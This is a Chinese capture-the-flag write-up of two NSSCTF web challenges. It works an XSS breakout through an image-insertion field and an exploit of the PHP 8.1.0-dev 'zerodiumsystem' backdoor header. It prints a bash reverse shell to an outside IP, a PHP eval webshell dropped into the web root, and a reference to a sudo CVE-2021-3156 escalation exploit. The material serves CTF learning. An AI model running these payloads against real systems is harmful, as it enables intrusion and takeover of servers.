【Web】NSSCTF Round#18 Basic个人wp(部分)

目录

①门酱想玩什么呢?

②Becomeroot


①门酱想玩什么呢?

先试一下随便给个链接

不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可

我们研究下评论区

从评论区知道,要让门酱玩元梦之星,考虑直接

<script>document.location="https://ymzx.qq.com/";</script>

尝试传了发现不能起作用跳转,估计是<>这些被html实体化了

那咋整呢,题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头,否则不能解析为图片)

链接是插入到了src中,我们可以直接用">闭合img标签

评论传

复制代码
http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png

成功重定向到元梦之星官网

bp抓包

获得该条恶意评论链接

复制代码
http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D

把这个链接给门酱即可获得flag

②Becomeroot

进来直接告诉我们php版本是8.1.0-dev

PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客

复制代码
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");

直接反弹shell,发现要提权

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令

脚本不太好整到靶机上,还是写马连webshell方便点

复制代码
User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");

尝试用suid提权插件来整,失败

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器

提权执行命令(环境没了,借了别的师傅的图)

相关推荐
zhu12893035562 小时前
网络安全的重要性与防护措施
网络·安全·web安全
渗透测试老鸟-九青2 小时前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链
virelin_Y.lin3 小时前
系统与网络安全------Windows系统安全(7)
windows·web安全·系统安全·ftp
写代码的小王吧3 小时前
【Java可执行命令】(十)JAR文件签名工具 jarsigner:通过数字签名及验证保证代码信任与安全,深入解析 Java的 jarsigner命令~
java·开发语言·网络·安全·web安全·网络安全·jar
独行soc7 小时前
2025年渗透测试面试题总结-某腾某讯-技术安全实习生升级(题目+回答)
java·python·安全·web安全·面试·职场和发展·红蓝攻防
神经毒素8 小时前
WEB安全--文件上传漏洞--其他绕过方式
安全·web安全·文件上传漏洞
予安灵8 小时前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
it技术分享just_free10 小时前
软考教材重点内容 信息安全工程师 第21章 网络设备安全
web安全·网络安全·信息安全·系统安全·软考
安全方案16 小时前
精心整理-2024最新网络安全-信息安全全套资料(学习路线、教程笔记、工具软件、面试文档).zip
笔记·学习·web安全